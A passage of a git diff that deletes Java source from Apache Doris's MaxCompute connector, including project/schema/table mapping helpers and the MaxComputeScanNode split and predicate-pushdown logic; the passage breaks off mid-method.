TableIdentifier getTableIdentifier(String dbName, String tableName); - - List getPartitions(Odps mcClient, String dbName, String tableName); - - Iterator getPartitionIterator(Odps mcClient, String dbName, String tableName); - - Table getOdpsTable(Odps mcClient, String dbName, String tableName); - - Tables.TableCreator createTableCreator(Odps mcClient, String dbName, String tableName, TableSchema schema); - - void dropTable(Odps mcClient, String dbName, String tableName, boolean ifExists) throws OdpsException; - - void createDb(Odps mcClient, String dbName, boolean ifNotExists) throws DdlException; - - void dropDb(Odps mcClient, String dbName, boolean ifExists) throws DdlException; - - /** - * `mc.enable.namespace.schema` = true. - * mapping structure between Doris and MaxCompute: - * Doris : catalog, dbName, tableName - * MaxCompute: project, schema, table - */ - class ProjectSchemaTableHelper implements McStructureHelper { - private String defaultProjectName = null; - - public ProjectSchemaTableHelper(String defaultProjectName) { - this.defaultProjectName = defaultProjectName; - } - - @Override - public List listTableNames(Odps mcClient, String dbName) { - List result = new ArrayList<>(); - mcClient.tables().iterable(defaultProjectName, dbName, null, false) - .forEach(e -> result.add(e.getName())); - return result; - } - - @Override - public List listDatabaseNames(Odps mcClient, String defaultProject) { - List result = new ArrayList<>(); - Iterator iterator = mcClient.schemas().iterator(defaultProjectName); - while (iterator.hasNext()) { - Schema schema = iterator.next(); - result.add(schema.getName()); - } - return result; - } - - @Override - public List getPartitions(Odps mcClient, String dbName, String tableName) { - return mcClient.tables().get(defaultProjectName, dbName, tableName).getPartitions(); - } - - @Override - public Iterator getPartitionIterator(Odps mcClient, String dbName, String tableName) { - return mcClient.tables().get(defaultProjectName, dbName, tableName).getPartitions().iterator(); - } - - @Override - public boolean tableExist(Odps mcClient, String dbName, String tableName) throws RuntimeException { - try { - return mcClient.tables().exists(defaultProjectName, dbName, tableName); - } catch (OdpsException e) { - throw new RuntimeException(e); - } - } - - @Override - public boolean databaseExist(Odps mcClient, String dbName) throws RuntimeException { - try { - return mcClient.schemas().exists(dbName); - } catch (OdpsException e) { - throw new RuntimeException(e); - } - } - - @Override - public TableIdentifier getTableIdentifier(String dbName, String tableName) { - return TableIdentifier.of(defaultProjectName, dbName, tableName); - } - - @Override - public Table getOdpsTable(Odps mcClient, String dbName, String tableName) { - return mcClient.tables().get(defaultProjectName, dbName, tableName); - } - - @Override - public Tables.TableCreator createTableCreator(Odps mcClient, String dbName, String tableName, - TableSchema schema) { - // dbName is the schema name, defaultProjectName is the project - return mcClient.tables().newTableCreator(defaultProjectName, tableName, schema) - .withSchemaName(dbName); - } - - @Override - public void dropTable(Odps mcClient, String dbName, String tableName, boolean ifExists) - throws OdpsException { - // dbName is the schema name, defaultProjectName is the project - mcClient.tables().delete(defaultProjectName, dbName, tableName, ifExists); - } - - @Override - public void createDb(Odps mcClient, String dbName, boolean ifNotExists) throws DdlException { - try { - if (ifNotExists && mcClient.schemas().exists(dbName)) { - return; - } - mcClient.schemas().create(defaultProjectName, dbName); - } catch (OdpsException e) { - throw new DdlException("Failed to create schema '" + dbName + "': " + e.getMessage(), e); - } - } - - @Override - public void dropDb(Odps mcClient, String dbName, boolean ifExists) throws DdlException { - try { - if (ifExists && !mcClient.schemas().exists(dbName)) { - return; - } - mcClient.schemas().delete(defaultProjectName, dbName); - } catch (OdpsException e) { - throw new DdlException("Failed to drop schema '" + dbName + "': " + e.getMessage(), e); - } - } - } - - /** - * `mc.enable.namespace.schema` = false. - * mapping structure between Doris and MaxCompute: - * Doris : dbName, tableName - * MaxCompute: project, table - */ - class ProjectTableHelper implements McStructureHelper { - private String catalogOwner = null; - - @Override - public boolean tableExist(Odps mcClient, String dbName, String tableName) throws RuntimeException { - try { - return mcClient.tables().exists(dbName, tableName); - } catch (OdpsException e) { - throw new RuntimeException(e); - } - } - - - @Override - public List listTableNames(Odps mcClient, String dbName) { - List result = new ArrayList<>(); - mcClient.tables().iterable(dbName).forEach(e -> result.add(e.getName())); - return result; - } - - @Override - public List listDatabaseNames(Odps mcClient, String defaultProject) { - List result = new ArrayList<>(); - result.add(defaultProject); - try { - result.add(defaultProject); - if (StringUtils.isNullOrEmpty(catalogOwner)) { - SecurityManager sm = mcClient.projects().get().getSecurityManager(); - String whoami = sm.runQuery("whoami", false); - - JsonObject js = JsonParser.parseString(whoami).getAsJsonObject(); - catalogOwner = js.get("DisplayName").getAsString(); - } - Iterator iterator = mcClient.projects().iterator(catalogOwner); - while (iterator.hasNext()) { - Project project = iterator.next(); - if (!project.getName().equals(defaultProject)) { - result.add(project.getName()); - } - } - } catch (OdpsException e) { - throw new RuntimeException(e); - } - return result; - } - - @Override - public List getPartitions(Odps mcClient, String dbName, String tableName) { - return mcClient.tables().get(dbName, tableName).getPartitions(); - } - - @Override - public Iterator getPartitionIterator(Odps mcClient, String dbName, String tableName) { - return mcClient.tables().get(dbName, tableName).getPartitions().iterator(); - } - - @Override - public boolean databaseExist(Odps mcClient, String dbName) throws RuntimeException { - try { - return mcClient.projects().exists(dbName); - } catch (OdpsException e) { - throw new RuntimeException(e); - } - } - - @Override - public TableIdentifier getTableIdentifier(String dbName, String tableName) { - return TableIdentifier.of(dbName, tableName); - } - - - @Override - public Table getOdpsTable(Odps mcClient, String dbName, String tableName) { - return mcClient.tables().get(dbName, tableName); - } - - @Override - public Tables.TableCreator createTableCreator(Odps mcClient, String dbName, String tableName, - TableSchema schema) { - // dbName is the project name - return mcClient.tables().newTableCreator(dbName, tableName, schema); - } - - @Override - public void dropTable(Odps mcClient, String dbName, String tableName, boolean ifExists) - throws OdpsException { - // dbName is the project name - mcClient.tables().delete(dbName, tableName, ifExists); - } - - @Override - public void createDb(Odps mcClient, String dbName, boolean ifNotExists) throws DdlException { - throw new DdlException( - "Create database is not supported when mc.enable.namespace.schema is false."); - } - - @Override - public void dropDb(Odps mcClient, String dbName, boolean ifExists) throws DdlException { - throw new DdlException( - "Drop database is not supported when mc.enable.namespace.schema is false."); - } - } - - static McStructureHelper getHelper(boolean isEnableNamespaceSchema, String defaultProjectName) { - return isEnableNamespaceSchema - ? new ProjectSchemaTableHelper(defaultProjectName) - : new ProjectTableHelper(); - } -} diff --git a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java b/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java deleted file mode 100644 index ae297d99c441e4..00000000000000 --- a/fe/fe-core/src/main/java/org/apache/doris/datasource/maxcompute/source/MaxComputeScanNode.java +++ /dev/null @@ -1,814 +0,0 @@ -// Licensed to the Apache Software Foundation (ASF) under one -// or more contributor license agreements. See the NOTICE file -// distributed with this work for additional information -// regarding copyright ownership. The ASF licenses this file -// to you under the Apache License, Version 2.0 (the -// "License"); you may not use this file except in compliance -// with the License. You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, -// software distributed under the License is distributed on an -// "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY -// KIND, either express or implied. See the License for the -// specific language governing permissions and limitations -// under the License. - -package org.apache.doris.datasource.maxcompute.source; - -import org.apache.doris.analysis.BinaryPredicate; -import org.apache.doris.analysis.CompoundPredicate; -import org.apache.doris.analysis.CompoundPredicate.Operator; -import org.apache.doris.analysis.DateLiteral; -import org.apache.doris.analysis.Expr; -import org.apache.doris.analysis.ExprToExprNameVisitor; -import org.apache.doris.analysis.InPredicate; -import org.apache.doris.analysis.IsNullPredicate; -import org.apache.doris.analysis.LiteralExpr; -import org.apache.doris.analysis.SlotRef; -import org.apache.doris.analysis.TupleDescriptor; -import org.apache.doris.catalog.Column; -import org.apache.doris.catalog.Env; -import org.apache.doris.catalog.ScalarType; -import org.apache.doris.catalog.TableIf; -import org.apache.doris.common.AnalysisException; -import org.apache.doris.common.UserException; -import org.apache.doris.common.maxcompute.MCProperties; -import org.apache.doris.common.util.LocationPath; -import org.apache.doris.datasource.FileQueryScanNode; -import org.apache.doris.datasource.TableFormatType; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalCatalog; -import org.apache.doris.datasource.maxcompute.MaxComputeExternalTable; -import org.apache.doris.datasource.maxcompute.source.MaxComputeSplit.SplitType; -import org.apache.doris.nereids.trees.plans.logical.LogicalFileScan.SelectedPartitions; -import org.apache.doris.nereids.util.DateUtils; -import org.apache.doris.planner.PlanNodeId; -import org.apache.doris.planner.ScanContext; -import org.apache.doris.qe.SessionVariable; -import org.apache.doris.spi.Split; -import org.apache.doris.thrift.TFileFormatType; -import org.apache.doris.thrift.TFileRangeDesc; -import org.apache.doris.thrift.TMaxComputeFileDesc; -import org.apache.doris.thrift.TTableFormatFileDesc; - -import com.aliyun.odps.OdpsType; -import com.aliyun.odps.PartitionSpec; -import com.aliyun.odps.table.configuration.ArrowOptions; -import com.aliyun.odps.table.configuration.ArrowOptions.TimestampUnit; -import com.aliyun.odps.table.configuration.SplitOptions; -import com.aliyun.odps.table.optimizer.predicate.Predicate; -import com.aliyun.odps.table.read.TableBatchReadSession; -import com.aliyun.odps.table.read.TableReadSessionBuilder; -import com.aliyun.odps.table.read.split.InputSplitAssigner; -import com.aliyun.odps.table.read.split.impl.IndexedInputSplit; -import jline.internal.Log; -import lombok.Setter; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -import java.io.ByteArrayOutputStream; -import java.io.IOException; -import java.io.ObjectOutputStream; -import java.io.Serializable; -import java.time.LocalDateTime; -import java.time.ZoneId; -import java.time.ZonedDateTime; -import java.time.format.DateTimeFormatter; -import java.util.ArrayList; -import java.util.Base64; -import java.util.Collections; -import java.util.HashMap; -import java.util.List; -import java.util.Map; -import java.util.Set; -import java.util.concurrent.CompletableFuture; -import java.util.concurrent.Executor; -import java.util.concurrent.atomic.AtomicInteger; -import java.util.concurrent.atomic.AtomicReference; -import java.util.stream.Collectors; - -public class MaxComputeScanNode extends FileQueryScanNode { - static final DateTimeFormatter dateTime3Formatter = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss.SSS"); - static final DateTimeFormatter dateTime6Formatter = DateTimeFormatter.ofPattern("yyyy-MM-dd HH:mm:ss.SSSSSS"); - - private static final Logger LOG = LogManager.getLogger(MaxComputeScanNode.class); - - private final MaxComputeExternalTable table; - private Predicate filterPredicate; - List requiredPartitionColumns = new ArrayList<>(); - List orderedRequiredDataColumns = new ArrayList<>(); - - private int connectTimeout; - private int readTimeout; - private int retryTimes; - - private boolean onlyPartitionEqualityPredicate = false; - - @Setter - private SelectedPartitions selectedPartitions = null; - - private static final LocationPath ROW_OFFSET_PATH = LocationPath.of("/row_offset"); - private static final LocationPath BYTE_SIZE_PATH = LocationPath.of("/byte_size"); - - - // For new planner - public MaxComputeScanNode(PlanNodeId id, TupleDescriptor desc, - SelectedPartitions selectedPartitions, boolean needCheckColumnPriv, - SessionVariable sv, ScanContext scanContext) { - this(id, desc, "MCScanNode", selectedPartitions, needCheckColumnPriv, sv, scanContext); - } - - private MaxComputeScanNode(PlanNodeId id, TupleDescriptor desc, String planNodeName, - SelectedPartitions selectedPartitions, boolean needCheckColumnPriv, SessionVariable sv, - ScanContext scanContext) { - super(id, desc, planNodeName, scanContext, needCheckColumnPriv, sv); - table = (MaxComputeExternalTable) desc.getTable(); - this.selectedPartitions = selectedPartitions; - } - - @Override - protected void setScanParams(TFileRangeDesc rangeDesc, Split split) { - if (split instanceof MaxComputeSplit) { - setScanParams(rangeDesc, (MaxComputeSplit) split); - } - } - - private void setScanParams(TFileRangeDesc rangeDesc, MaxComputeSplit maxComputeSplit) { - TTableFormatFileDesc tableFormatFileDesc = new TTableFormatFileDesc(); - tableFormatFileDesc.setTableFormatType(TableFormatType.MAX_COMPUTE.value()); - TMaxComputeFileDesc fileDesc = new TMaxComputeFileDesc(); - fileDesc.setPartitionSpec("deprecated"); - fileDesc.setTableBatchReadSession(maxComputeSplit.scanSerialize); - fileDesc.setSessionId(maxComputeSplit.getSessionId()); - - fileDesc.setReadTimeout(readTimeout); - fileDesc.setConnectTimeout(connectTimeout); - fileDesc.setRetryTimes(retryTimes); - - tableFormatFileDesc.setMaxComputeParams(fileDesc); - rangeDesc.setTableFormatParams(tableFormatFileDesc); - rangeDesc.setPath("[ " + maxComputeSplit.getStart() + " , " + maxComputeSplit.getLength() + " ]"); - rangeDesc.setStartOffset(maxComputeSplit.getStart()); - rangeDesc.setSize(maxComputeSplit.getLength()); - } - - - private void createRequiredColumns() { - Set requiredSlots = - desc.getSlots().stream().map(e -> e.getColumn().getName()).collect(Collectors.toSet()); - - Set partitionColumns = - table.getPartitionColumns().stream().map(Column::getName).collect(Collectors.toSet()); - - requiredPartitionColumns.clear(); - orderedRequiredDataColumns.clear(); - - for (Column column : table.getColumns()) { - String columnName = column.getName(); - if (!requiredSlots.contains(columnName)) { - continue; - } - if (partitionColumns.contains(columnName)) { - requiredPartitionColumns.add(columnName); - } else { - orderedRequiredDataColumns.add(columnName); - } - } - } - - /** - * For no partition table: request requiredPartitionSpecs is empty - * For partition table: if requiredPartitionSpecs is empty, get all partition data. - */ - TableBatchReadSession createTableBatchReadSession(List requiredPartitionSpecs) throws IOException { - MaxComputeExternalCatalog mcCatalog = (MaxComputeExternalCatalog) table.getCatalog(); - return createTableBatchReadSession(requiredPartitionSpecs, mcCatalog.getSplitOption()); - } - - TableBatchReadSession createTableBatchReadSession( - List requiredPartitionSpecs, SplitOptions splitOptions) throws IOException { - MaxComputeExternalCatalog mcCatalog = (MaxComputeExternalCatalog) table.getCatalog(); - - readTimeout = mcCatalog.getReadTimeout(); - connectTimeout = mcCatalog.getConnectTimeout(); - retryTimes = mcCatalog.getRetryTimes(); - - TableReadSessionBuilder scanBuilder = new TableReadSessionBuilder(); - - return scanBuilder.identifier(table.getTableIdentifier()) - .withSettings(mcCatalog.getSettings()) - .withSplitOptions(splitOptions) - .requiredPartitionColumns(requiredPartitionColumns) - .requiredDataColumns(orderedRequiredDataColumns) - .withFilterPredicate(filterPredicate) - .requiredPartitions(requiredPartitionSpecs) - .withArrowOptions( - ArrowOptions.newBuilder() - .withDatetimeUnit(TimestampUnit.MILLI) - .withTimestampUnit(TimestampUnit.MICRO) - .build() - ).buildBatchReadSession(); - } - - @Override - public boolean isBatchMode() { - if (table.getPartitionColumns().isEmpty()) { - return false; - } - - com.aliyun.odps.Table odpsTable = table.getOdpsTable(); - if (desc.getSlots().isEmpty() || odpsTable.getFileNum() <= 0) { - return false; - } - - int numPartitions = sessionVariable.getNumPartitionsInBatchMode(); - return numPartitions > 0 - && selectedPartitions != SelectedPartitions.NOT_PRUNED - && selectedPartitions.selectedPartitions.size() >= numPartitions; - } - - @Override - public int numApproximateSplits() { - return selectedPartitions.selectedPartitions.size(); - } - - @Override - public void startSplit(int numBackends) { - this.totalPartitionNum = selectedPartitions.totalPartitionNum; - this.selectedPartitionNum = selectedPartitions.selectedPartitions.size(); - - if (selectedPartitions.selectedPartitions.isEmpty()) { - //no need read any partition data. - return; - } - - createRequiredColumns(); - List requiredPartitionSpecs = new ArrayList<>(); - selectedPartitions.selectedPartitions.forEach( - (key, value) -> requiredPartitionSpecs.add(new PartitionSpec(key)) - ); - - int batchNumPartitions = sessionVariable.getNumPartitionsInBatchMode(); - - Executor scheduleExecutor = Env.getCurrentEnv().getExtMetaCacheMgr().getScheduleExecutor(); - AtomicReference batchException = new AtomicReference<>(null); - AtomicInteger numFinishedPartitions = new AtomicInteger(0); - - CompletableFuture.runAsync(() -> { - for (int beginIndex = 0; beginIndex < requiredPartitionSpecs.size(); beginIndex += batchNumPartitions) { - int endIndex = Math.min(beginIndex + batchNumPartitions, requiredPartitionSpecs.size()); - if (batchException.get() != null || splitAssignment.isStop()) { - break; - } - List requiredBatchPartitionSpecs = requiredPartitionSpecs.subList(beginIndex, endIndex); - int curBatchSize = endIndex - beginIndex; - - try { - CompletableFuture.runAsync(() -> { - try { - TableBatchReadSession tableBatchReadSession = - createTableBatchReadSession(requiredBatchPartitionSpecs); - List batchSplit = getSplitByTableSession(tableBatchReadSession); - - if (splitAssignment.needMoreSplit()) { - splitAssignment.addToQueue(batchSplit); - } - } catch (Exception e) { - batchException.set(new UserException(e.getMessage(), e)); - } finally { - if (batchException.get() != null) { - splitAssignment.setException(batchException.get()); - } - - if (numFinishedPartitions.addAndGet(curBatchSize) == requiredPartitionSpecs.size()) { - splitAssignment.finishSchedule(); - } - } - }, scheduleExecutor); - } catch (Exception e) { - batchException.set(new UserException(e.getMessage(), e)); - } - - if (batchException.get() != null) { - splitAssignment.setException(batchException.get()); - } - } - }, scheduleExecutor); - } - - @Override - protected void convertPredicate() { - if (conjuncts.isEmpty()) { - this.filterPredicate = Predicate.NO_PREDICATE; - } - - List odpsPredicates = new ArrayList<>(); - for (Expr dorisPredicate : conjuncts) { - try { - odpsPredicates.add(convertExprToOdpsPredicate(dorisPredicate)); - } catch (Exception e) { - Log.warn("Failed to convert predicate " + dorisPredicate.toString() + "Reason: " - + e.getMessage()); - } - } - - if (odpsPredicates.isEmpty()) { - this.filterPredicate = Predicate.NO_PREDICATE; - } else if (odpsPredicates.size() == 1) { - this.filterPredicate = odpsPredicates.get(0); - } else { - com.aliyun.odps.table.optimizer.predicate.CompoundPredicate - filterPredicate = new com.aliyun.odps.table.optimizer.predicate.CompoundPredicate( - com.aliyun.odps.table.optimizer.predicate.CompoundPredicate.Operator.AND); - - for (Predicate odpsPredicate : odpsPredicates) { - filterPredicate.addPredicate(odpsPredicate); - } - this.filterPredicate = filterPredicate; - } - - this.onlyPartitionEqualityPredicate = checkOnlyPartitionEqualityPredicate(); - } - - private boolean checkOnlyPartitionEqualityPredicate() { - if (conjuncts.isEmpty()) { - return true; - } - Set partitionColumns = - table.getPartitionColumns().stream().map(Column::getName).collect(Collectors.toSet()); - for (Expr expr : conjuncts) { - if (expr instanceof BinaryPredicate) { - BinaryPredicate bp = (BinaryPredicate) expr; - if (bp.getOp() != BinaryPredicate.Operator.EQ) { - return false; - } - if (!(bp.getChild(0) instanceof SlotRef) || !(bp.getChild(1) instanceof LiteralExpr)) { - return false; - } - String colName = ((SlotRef) bp.getChild(0)).getColumnName(); - if (!partitionColumns.contains(colName)) { - return false; - } - } else if (expr instanceof InPredicate) { - InPredicate inPredicate = (InPredicate) expr; - if (inPredicate.isNotIn()) { - return false; - } - if (!(inPredicate.getChild(0) instanceof SlotRef)) { - return false; - } - String colName = ((SlotRef) inPredicate.getChild(0)).getColumnName(); - if (!partitionColumns.contains(colName)) { - return false; - } - for (int i = 1; i < inPredicate.getChildren().size(); i++) { - if (!(inPredicate.getChild(i) instanceof LiteralExpr)) { - return false; - } - } - } else { - return false; - } - } - return true; - } - - private Predicate convertExprToOdpsPredicate(Expr expr) throws AnalysisException { - Predicate odpsPredicate = null; - if (expr instanceof CompoundPredicate) { - CompoundPredicate compoundPredicate = (CompoundPredicate) expr; - - com.aliyun.odps.table.optimizer.predicate.CompoundPredicate.Operator odpsOp; - switch (compoundPredicate.getOp()) { - case AND: - odpsOp = com.aliyun.odps.table.optimizer.predicate.CompoundPredicate.Operator.AND; - break; - case OR: - odpsOp = com.aliyun.odps.table.optimizer.predicate.CompoundPredicate.Operator.OR; - break; - case NOT: - odpsOp = com.aliyun.odps.table.optimizer.predicate.CompoundPredicate.Operator.NOT; - break; - default: - throw new AnalysisException("Unknown operator: " + compoundPredicate.getOp()); - } - - List odpsPredicates = new ArrayList<>(); - - odpsPredicates.add(convertExprToOdpsPredicate(expr.getChild(0))); - - if (compoundPredicate.getOp() != Operator.NOT) { - odpsPredicates.add(convertExprToOdpsPredicate(expr.getChild(1))); - } - odpsPredicate = new com.aliyun.odps.table.optimizer.predicate.CompoundPredicate(odpsOp, odpsPredicates); - - } else if (expr instanceof InPredicate) { - - InPredicate inPredicate = (InPredicate) expr; - com.aliyun.odps.table.optimizer.predicate.InPredicate.Operator odpsOp = - inPredicate.isNotIn() - ? com.aliyun.odps.table.optimizer.predicate.InPredicate.Operator.IN - : com.aliyun.odps.table.optimizer.predicate.InPredicate.Operator.NOT_IN; - - String columnName = convertSlotRefToColumnName(expr.getChild(0)); - if (!table.getColumnNameToOdpsColumn().containsKey(columnName)) { - Map columnMap = table.getColumnNameToOdpsColumn(); - LOG.warn("ColumnNameToOdpsColumn size=" + columnMap.size() - + ", keys=[" + String.join(", ", columnMap.keySet()) + "]"); - throw new AnalysisException("Column " + columnName + " not found in table, can not push " - + "down predicate to MaxCompute " + table.getName()); - } - com.aliyun.odps.OdpsType odpsType = table.getColumnNameToOdpsColumn().get(columnName).getType(); - - StringBuilder stringBuilder = new StringBuilder(); - stringBuilder.append(columnName); - stringBuilder.append(" "); - stringBuilder.append(odpsOp.getDescription()); - stringBuilder.append(" ("); - - for (int i = 1; i < inPredicate.getChildren().size(); i++) { - stringBuilder.append(convertLiteralToOdpsValues(odpsType, expr.getChild(i))); - if (i < inPredicate.getChildren().size() - 1) { - stringBuilder.append(", "); - } - } - stringBuilder.append(" )"); - - odpsPredicate = new com.aliyun.odps.table.optimizer.predicate.RawPredicate(stringBuilder.toString()); - - } else if (expr instanceof BinaryPredicate) { - BinaryPredicate binaryPredicate = (BinaryPredicate) expr; - - - com.aliyun.odps.table.optimizer.predicate.BinaryPredicate.Operator odpsOp; - switch (binaryPredicate.getOp()) { - case EQ: { - odpsOp = com.aliyun.odps.table.optimizer.predicate.BinaryPredicate.Operator.EQUALS; - break; - } - case NE: { - odpsOp = com.aliyun.odps.table.optimizer.predicate.BinaryPredicate.Operator.NOT_EQUALS; - break; - } - case GE: { - odpsOp = com.aliyun.odps.table.optimizer.predicate.BinaryPredicate.Operator.GREATER_THAN_OR_EQUAL; - break; - } - case LE: { - odpsOp = com.aliyun.odps.table.optimizer.predicate.BinaryPredicate.Operator.LESS_THAN_OR_EQUAL; - break; - } - case LT: { - odpsOp = com.aliyun.odps.table.optimizer.predicate.BinaryPredicate.Operator.LESS_THAN; - break; - } - case GT: { - odpsOp = com.aliyun.odps.table.optimizer.predicate.BinaryPredicate.Operator.GREATER_THAN; - break; - } - default: { - odpsOp = null; - break; - } - } - - if (odpsOp != null) { - String columnName = convertSlotRefToColumnName(expr.getChild(0)); - if (!table.getColumnNameToOdpsColumn().containsKey(columnName)) { - Map columnMap = table.getColumnNameToOdpsColumn(); - LOG.warn("ColumnNameToOdpsColumn size=" + columnMap.size() - + ", keys=[" + String.join(", ", columnMap.keySet()) + "]"); - throw new AnalysisException("Column " + columnName + " not found in table, can not push " - + "down predicate to MaxCompute " + table.getName()); - } - com.aliyun.odps.OdpsType odpsType = table.getColumnNameToOdpsColumn().get(columnName).getType(); - StringBuilder stringBuilder = new StringBuilder(); - stringBuilder.append(columnName); - stringBuilder.append(" "); - stringBuilder.append(odpsOp.getDescription()); - stringBuilder.append(" "); - stringBuilder.append(convertLiteralToOdpsValues(odpsType, expr.getChild(1))); - - odpsPredicate = new com.aliyun.odps.table.optimizer.predicate.RawPredicate(stringBuilder.toString()); - } - } else if (expr instanceof IsNullPredicate) { - IsNullPredicate isNullPredicate = (IsNullPredicate) expr; - com.aliyun.odps.table.optimizer.predicate.UnaryPredicate.Operator odpsOp = - isNullPredicate.isNotNull() - ? com.aliyun.odps.table.optimizer.predicate.UnaryPredicate.Operator.NOT_NULL - : com.aliyun.odps.table.optimizer.predicate.UnaryPredicate.Operator.IS_NULL; - - odpsPredicate = new com.aliyun.odps.table.optimizer.predicate.UnaryPredicate(odpsOp, - new com.aliyun.odps.table.optimizer.predicate.Attribute( - convertSlotRefToColumnName(expr.getChild(0)) - ) - ); - } - - - if (odpsPredicate == null) { - throw new AnalysisException("Do not support convert [" - + expr.accept(ExprToExprNameVisitor.INSTANCE, null) - + "] in convertExprToOdpsPredicate."); - } - return odpsPredicate; - } - - private String convertSlotRefToColumnName(Expr expr) throws AnalysisException { - if (expr instanceof SlotRef) { - return ((SlotRef) expr).getColumnName(); - } - - throw new AnalysisException("Do not support convert [" - + expr.accept(ExprToExprNameVisitor.INSTANCE, null) - + "] in convertSlotRefToAttribute."); - - } - - private String convertLiteralToOdpsValues(OdpsType odpsType, Expr expr) throws AnalysisException { - if (!(expr instanceof LiteralExpr)) { - throw new AnalysisException("Do not support convert [" - + expr.accept(ExprToExprNameVisitor.INSTANCE, null) - + "] in convertSlotRefToAttribute."); - } - LiteralExpr literalExpr = (LiteralExpr) expr; - - switch (odpsType) { - case BOOLEAN: - case TINYINT: - case SMALLINT: - case INT: - case BIGINT: - case DECIMAL: - case FLOAT: - case DOUBLE: { - return " " + literalExpr.toString() + " "; - } - case STRING: - case CHAR: - case VARCHAR: { - return " \"" + literalExpr.toString() + "\" "; - } - case DATE: { - DateLiteral dateLiteral = (DateLiteral) literalExpr; - ScalarType dstType = ScalarType.createDateV2Type(); - return " \"" + dateLiteral.getStringValue(dstType) + "\" "; - } - case DATETIME: { - MaxComputeExternalCatalog mcCatalog = (MaxComputeExternalCatalog) table.getCatalog(); - if (mcCatalog.getDateTimePredicatePushDown()) { - DateLiteral dateLiteral = (DateLiteral) literalExpr; - ScalarType dstType = ScalarType.createDatetimeV2Type(3); - - return " \"" + convertDateTimezone(dateLiteral.getStringValue(dstType), dateTime3Formatter, - ZoneId.of("UTC")) + "\" "; - } - break; - } - /** - * Disable the predicate pushdown to the odps API because the timestamp precision of odps is 9 and the - * mapping precision of Doris is 6. If we insert `2023-02-02 00:00:00.123456789` into odps, doris reads - * it as `2023-02-02 00:00:00.123456`. Since "789" is missing, we cannot push it down correctly. - */ - case TIMESTAMP: { - MaxComputeExternalCatalog mcCatalog = (MaxComputeExternalCatalog) table.getCatalog(); - if (mcCatalog.getDateTimePredicatePushDown()) { - DateLiteral dateLiteral = (DateLiteral) literalExpr; - ScalarType dstType = ScalarType.createDatetimeV2Type(6); - - return " \"" + convertDateTimezone(dateLiteral.getStringValue(dstType), dateTime6Formatter, - ZoneId.of("UTC")) + "\" "; - } - break; - } - case TIMESTAMP_NTZ: { - MaxComputeExternalCatalog mcCatalog = (MaxComputeExternalCatalog) table.getCatalog(); - if (mcCatalog.getDateTimePredicatePushDown()) { - DateLiteral dateLiteral = (DateLiteral) literalExpr; - ScalarType dstType = ScalarType.createDatetimeV2Type(6); - return " \"" + dateLiteral.getStringValue(dstType) + "\" "; - } - break; - } - default: { - break; - } - } - throw new AnalysisException("Do not support convert odps type [" + odpsType + "] to odps values."); - } - - - public static String convertDateTimezone(String dateTimeStr, DateTimeFormatter formatter, ZoneId toZone) { - if (DateUtils.getTimeZone().equals(toZone)) { - return dateTimeStr; - } - - LocalDateTime localDateTime = LocalDateTime.parse(dateTimeStr, formatter); - - ZonedDateTime sourceZonedDateTime = localDateTime.atZone(DateUtils.getTimeZone()); - ZonedDateTime targetZonedDateTime = sourceZonedDateTime.withZoneSameInstant(toZone); - - return targetZonedDateTime.format(formatter); - } - - - - @Override - public TFileFormatType getFileFormatType() { - return TFileFormatType.FORMAT_JNI; - } - - @Override - public List getPathPartitionKeys() { - return Collections.emptyList(); - } - - @Override - protected TableIf getTargetTable() throws UserException { - return table; - } - - @Override - protected Map getLocationProperties() throws UserException { - return new HashMap<>(); - } - - private List getSplitByTableSession(TableBatchReadSession tableBatchReadSession) throws IOException { - List result = new ArrayList<>(); - - long t0 = System.currentTimeMillis(); - String scanSessionSerialize = serializeSession(tableBatchReadSession); - long t1 = System.currentTimeMillis(); - LOG.info("MaxComputeScanNode getSplitByTableSession: serializeSession cost {} ms, " - + "serialized size: {} bytes", t1 - t0, scanSessionSerialize.length()); - - InputSplitAssigner assigner = tableBatchReadSession.getInputSplitAssigner(); - long t2 = System.currentTimeMillis(); - LOG.info("MaxComputeScanNode getSplitByTableSession: getInputSplitAssigner cost {} ms", t2 - t1); - - long modificationTime = table.getOdpsTable().getLastDataModifiedTime().getTime(); - - MaxComputeExternalCatalog mcCatalog = (MaxComputeExternalCatalog) table.getCatalog(); - - if (mcCatalog.getSplitStrategy().equals(MCProperties.SPLIT_BY_BYTE_SIZE_STRATEGY)) { - long t3 = System.currentTimeMillis(); - for (com.aliyun.odps.table.read.split.InputSplit split : assigner.getAllSplits()) { - MaxComputeSplit maxComputeSplit = - new MaxComputeSplit(BYTE_SIZE_PATH, - ((IndexedInputSplit) split).getSplitIndex(), -1, - mcCatalog.getSplitByteSize(), - modificationTime, null, - Collections.emptyList()); - - - maxComputeSplit.scanSerialize = scanSessionSerialize; - maxComputeSplit.splitType = SplitType.BYTE_SIZE; - maxComputeSplit.sessionId = split.getSessionId(); - - result.add(maxComputeSplit); - } - LOG.info("MaxComputeScanNode getSplitByTableSession: byte_size getAllSplits+build cost {} ms, " - + "splits size: {}", System.currentTimeMillis() - t3, result.size()); - } else { - long t3 = System.currentTimeMillis(); - long totalRowCount = assigner.getTotalRowCount(); - - long recordsPerSplit = mcCatalog.getSplitRowCount(); - for (long offset = 0; offset < totalRowCount; offset += recordsPerSplit) { - recordsPerSplit = Math.min(recordsPerSplit, totalRowCount - offset); - com.aliyun.odps.table.read.split.InputSplit split = - assigner.getSplitByRowOffset(offset, recordsPerSplit); - - MaxComputeSplit maxComputeSplit = - new MaxComputeSplit(ROW_OFFSET_PATH, - offset, recordsPerSplit, totalRowCount, modificationTime, null, - Collections.emptyList()); - - maxComputeSplit.scanSerialize = scanSessionSerialize; - maxComputeSplit.splitType = SplitType.ROW_OFFSET; - maxComputeSplit.sessionId = split.getSessionId(); - - result.add(maxComputeSplit); - } - LOG.info("MaxComputeScanNode getSplitByTableSession: row_offset getSplitByRowOffset+build cost {} ms, " - + "splits size: {}, totalRowCount: {}", System.currentTimeMillis() - t3, result.size(), - totalRowCount); - } - - return result; - } - - @Override - public List getSplits(int numBackends) throws UserException { - long startTime = System.currentTimeMillis(); - List result = new ArrayList<>(); - com.aliyun.odps.Table odpsTable = table.getOdpsTable(); - long 